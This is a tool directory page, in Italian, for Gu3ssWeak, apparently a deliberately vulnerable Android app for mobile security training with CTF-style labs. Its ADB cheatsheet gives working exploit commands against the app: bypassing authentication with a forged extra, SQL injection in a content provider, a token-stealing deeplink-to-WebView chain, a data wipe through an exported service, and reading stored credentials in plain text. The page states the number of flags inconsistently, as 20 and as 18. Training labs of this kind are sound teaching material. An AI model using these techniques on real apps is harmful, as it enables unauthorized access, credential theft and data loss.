Skip to content
KitploitKITPLOIT
StrumentiExploitsBlog
Log in
Invia
StrumentiExploitsBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

FeedContattoPrivacy© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Gu3ssWeak — App Android deliberatamente vulnerabile per la ricerca sulla sicurezza mobile e la pratica del bug bounty - OWASP Mobile Top 10 | Kitploit
Strumenti/GitHubGitHub/b4sith-sec/gu3ssweak
Sicurezza AndroidAnalisi delle VulnerabilitàPentesting di App MobiliSfruttamento di Applicazioni WebCTFPenetration TestingSicurezza MobileApprendimento e FormazionePercorsi e CorsiLab e Pratica
GitHub
82169 giorni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
b4sith-sec/gu3ssweak

Gu3ssWeak

App Android deliberatamente vulnerabile per la ricerca sulla sicurezza mobile e la pratica del bug bounty - OWASP Mobile Top 10

Vedi Repository

Gu3ssWeak

Un'applicazione Android deliberatamente vulnerabile per la ricerca sulla sicurezza mobile, la pratica del bug bounty e l'apprendimento in stile CTF. Contiene 21 vulnerabilità documentate mappate all'OWASP Mobile Top 10.


Avvio Rapido

git clone [email protected]:b4sith-sec/Gu3ssWeak.git
cd Gu3ssWeak
./gradlew assembleDebug
adb install -r app/build/outputs/apk/debug/app-debug.apk

Avvia l'app, affronta ogni lab, cattura le flag e inviale sulla scoreboard CTF integrata nell'app.


Categorie dei Lab

CategoriaVulnerabilitàFlag
WebViewWV-01 to WV-055
DeeplinkDL-01 to DL-04, DL-CHAIN5
Auth / SQL InjectionSQL-011
Admin PanelAP-01 to AP-042
ContentProviderCP-011
Broadcast ReceiverBR-01 to BR-032
ServiceSV-01, SV-02a, SV-02b2
Network InterceptionNET-011
Banking / OTPOTP-011
LFILFI-011
StorageSTORE-011
XSSXSS-01, XSS-022

20 flag in totale, più una master flag assegnata per averle catturate tutte.


Screenshot

Lab ListCTF Scoreboard
lab

Flusso CTF

  1. Apri l'app - atterra direttamente sulla lista dei lab.
  2. Scegli un lab, sfrutta la vulnerabilità (tramite UI, ADB o entrambi).
  3. Ogni exploit riuscito cattura automaticamente la sua flag.
  4. Tocca "Submit Flag" per confermare, o controlla i progressi su "CTF Scoreboard".
  5. Cattura tutte le 18 flag per sbloccare la master flag.

Documentazione

  • ARCHITECTURE.md - Come funziona internamente ogni componente vulnerabile
  • MITIGATIONS.md - Guida alla correzione e alla remediation per ogni vulnerabilità, inclusi i concetti di escalation da LFI a RCE
  • SECURITY.md - Politica di sicurezza e divulgazione responsabile
  • CHECKSUMS.txt - Checksum SHA256 per gli APK compilati

Cheatsheet degli Exploit ADB

# Admin panel - exported, no permission
adb shell am start -n com.gu3sswe4k.app/.activities.AdminPanelActivity

Admin panel - bypass the "fixed" auth check via forged intent extra

adb shell am start -n com.gu3sswe4k.app/.activities.AdminPanelActivity --ez is_authenticated true

ContentProvider grant bypass - parenthesis breakout escapes the single-row grant

adb shell "content query --uri content://com.gu3sswe4k.app.contacts/contacts/1 --where \"1) OR (1=1\""

# Token injection via broadcast
adb shell am broadcast -a com.gu3sswe4k.app.SEND_TOKEN --es token FAKE --es user attacker

# Data wipe via exported service
adb shell am startservice -n com.gu3sswe4k.app/.services.DataSyncService --es action wipe_user_data

# Deeplink to WebView RCE chain
adb shell am start -a android.intent.action.VIEW -d "vulndroid://settings?redirect=com.gu3sswe4k.app.activities.WebViewActivity&url=javascript:VulnBridge.stealToken()"

# Read plaintext stored credentials
adb shell run-as com.gu3sswe4k.app cat /data/data/com.gu3sswe4k.app/shared_prefs/login_prefs.xml

# Watch for logged secrets
adb logcat | grep Gu3ssWeak

Disclaimer

Questo progetto è puramente educativo. Tutte le vulnerabilità sono intenzionali e documentate. Le tecniche mostrate qui si applicano ad app reali, ma testa solo sistemi che possiedi o che sei autorizzato a testare. Vedi SECURITY.md per il disclaimer completo e le linee guida sulla divulgazione responsabile.

Licenza

MIT - vedi LICENSE.

Scarica lo strumento